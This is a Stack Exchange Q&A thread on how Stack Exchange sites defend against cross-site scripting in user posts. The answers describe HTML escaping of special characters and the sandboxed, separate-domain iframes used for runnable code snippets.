It seems to me that because Users can post questions and comments in them with HTML markup (possibly <script> tags), Stack Exchange sites would be very exposed to XSS attacks. How do they protect from this?
Asked
Active
Viewed 2,303 times
11
Tom Grant
- 271
- 1
- 8
-
5What research have you done? Where have you looked, to understand how Stack Exchange builds HTML pages from markup? (It's well documented that Stack Exchange uses Markdown.) Where have you looked to understand how Markdown avoids XSS? (Hint: it's explained here on this site.) Doing a lot of research before asking, and showing us in the question what research you've done, helps us give you better ,more focused answers and makes for better questions. – D.W. Jan 30 '15 at 23:47
-
Have you *tried* putting a script tag in a post? <- That's what happens when you do – Ajedi32 Jan 31 '15 at 18:43
-
@Ajedi32 it's what he is asking for. How is StackExchange allowing _some_ HTML while avoiding XSS? – rev Jan 31 '15 at 18:48
-
@AcidShout My comment there was mostly in response to the remark about "possibly ` – Ajedi32 Jan 31 '15 at 21:33
2 Answers
28
For general comments, the script tags are properly escaped, so that it's just interpreted as text instead of as actual code. In this case, that sort of thing is handled via something known as HTML encoding, where your <script> tag would get turned into <script> and rendered as a text string instead of interpreted as code.
That said, StackOverflow has worked on a new feature that allows executable javascript in peoples' answers: http://blog.stackoverflow.com/2014/09/introducing-runnable-javascript-css-and-html-code-snippets/
Some of the security points from the article I want to highlight:
Are Stack Snippets Safe?
Yes, as much as the web in general is safe. You are not in any more danger than you are when browsing any site with JavaScript enabled. With that said, the snippets are running client code in your browser, and you should always exercise caution when running code contributed by another user. We isolate snippets from our sites to block access to your private Stack Exchange data:
•We use HTML5 sandboxed iframes in order to prevent many forms of malicious attack.
•We render the Snippets on an external domain (stacksnippets.net) in order to ensure that the same-origin policy is not in effect and to keep the snippets from accessing your logged-in session or cookies.
Like all other aspects of our site, Stack Snippets are ultimately governed by the community. Because users can still write code that creates annoying behaviors like infinite loops or pop-ups, we disable snippets on any post that is heavily downvoted (scoring less than -3 on Stack Overflow, -8 on Meta). If you see bad code that you think should be disabled, downvote the post. If you see code that is intended to be harmful (such as an attempt at phishing), you should flag it for moderator attention.
-
HTML5 is the safest way to do anything on the web today, it even replaces most web players. – Virusboy Jan 31 '15 at 00:23
-
2Obviously, if you aren't using a HTML5 supporting browser, you're screwed anyway. – bjb568 Jan 31 '15 at 17:42
-
HTML5 doesn't mitigate XSS vulnerabilities like the type mentioned in the original question. Competent developers do. – Greg Feb 02 '15 at 17:06
3
This is done by sanitizing data that is input by users and converting it to a safe format for displaying on the screen. In essence you take the user input and convert special characters ( <, >, / , \, etc) into html entities, which renders them harmless for displaying on a web page.
willc
- 652
- 3
- 9
-
1"Escaping" is a better term than "sanitizing". The latter gives a false impression that some bad input is discarded, and therefore I never use that word. – 200_success Jan 31 '15 at 23:36